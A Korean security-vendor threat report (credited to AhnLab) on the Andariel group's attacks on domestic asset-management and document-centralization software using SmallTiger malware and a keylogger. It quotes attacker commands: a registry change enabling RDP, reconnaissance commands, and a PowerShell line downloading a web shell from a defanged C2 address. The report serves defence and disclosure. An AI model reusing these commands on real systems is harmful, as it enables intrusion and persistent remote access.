㈜소프트이천

안다리엘(Andariel) 그룹은 과거부터 국내 기업에서 사용하는 다양한 소프트웨어를 공격하고, 솔루션취약점을 악용해오고 있다. 2024년에도 안다리엘 공격 사례는 지속됐으며, 주로 스몰타이거(SmallTiger)를 설치한 것으로 확인됐다. 안다리엘 그룹의 국내 솔루션 대상 공격 사례를 자세히 살펴보자.

1. 국내 자산 관리 솔루션 대상 공격 사례

국내 자산 관리 솔루션은 공격에 지속적으로 악용되고 있으며, 자산 관리 솔루션이라는 특성상 제어 서버가 탈취당한 후 공격자가 이를 악용해 악성코드 설치 명령을 실행하는 방식인 것으로 추정된다. 해당 공격 사례에서는 주로 모드로더(ModeLoader)가 설치됐다.

또한, 외부에 노출된 업데이트 서버를 대상으로 무차별 대입 공격 및 사전 공격을 수행해 제어 권한을 탈취하는 사례도 확인됐다. 해당 사례에서 공격자는 업데이트 프로그램을 스몰타이거로 교체했다. 이 과정을 통해 조직 내부 시스템에 스몰타이거를 배포하려고 시도한 것으로 추정된다.

이번에 확인된 사례에서는 최초 침투 방식이나 구체적인 유포 방식은 확인되지 않지만, 해당 자산 관리 솔루션의 설치 경로에는 스몰타이거가 설치됐으며, 키로거(KeyLogger)가 함께 사용됐다. 키로거는 동일 경로의 “MsMpLog.tmp” 파일에 사용자의 키 입력을 저장하는 것이 특징이다.

[그림 1] 키로깅 데이터

공격자는 스몰타이거를 이용해 추후 감염 대상 시스템에 RDP로 접근할 수 있도록 설정했다. RDP를 활성화하는데 사용되는 다음 명령은 스몰타이거를 통해 실행됐으며, 이 외에도 공격자는 백도어 계정을 추가하고 은폐하기 위한 목적으로 CreateHiddenAccount라는 오픈 소스 툴을 설치했다.

> reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

[그림 2] 스몰타이거를 통해 실행된 RDP 활성화 명령

2. 국내 문서 중앙화 솔루션 대상 공격 사례

최근에는 국내 문서 중앙화 솔루션을 대상으로 한 공격도 확인되고 있다. 해당 솔루션에서 사용하는 아파치 톰캣(Apache Tomcat) 웹 서버들은 모두 오래된 버전이며, 공격자는 최신 버전으로 업데이트되지 않은 부분을 노리는 것으로 추정된다.

[그림 3] 국내 문서 중앙화 솔루션이 설치된 피해 웹 서버

공격자는 최초 침투 이후 시스템의 기본적인 정보들을 조회했으며, Advanced Port Scanner가 설치된 이력도 존재한다.

> ping 20.20.100.32
> tasklist
> ipconfig /all
> netstat -noa
> whoami

이후에는 다음과 같은 파워셸(PowerShell) 명령으로 웹 쉘(Web Shell)을 설치하는 것으로 추정된다. 현재 다운로드는 불가하지만 다운로드 서버인 “45.61.148[.]153”은 위 공격 사례에서 확인된 스몰타이거의 C&C 서버 주소이기도 하다.

powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘hxxp://45.61.148[.]153/pizza.jsp’,’C:\*********\web\*********\threadstate.jsp’)

결론

이처럼 안다리엘 공격 그룹은 최근 스몰타이거를 이용해 국내의 다양한 솔루션을 악용하거나 취약점을 공격해 악성코드를 설치하고 있다. 이번에는 과거부터 지속적으로 악용되던 자산 관리 솔루션 공격과 더불어, 국내 문서 중앙화 솔루션을 겨냥한 공격도 새롭게 확인됐다.

따라서 기업의 보안 담당자는 자산 관리 솔루션이나 문서 중앙화 솔루션과 같은 중앙 집중형 관리 솔루션에 대한 모니터링을 강화하고, 프로그램 보안 취약점이 있다면 패치를 수행해야 한다. 그리고 운영체제(OS) 및 브라우저 등 프로그램들을 패치하고, AhnLab V3를 최신 버전으로 업데이트해 악성코드 감염을 사전에 차단할 수 있도록 신경 써야 한다.

​출처 : AhnLab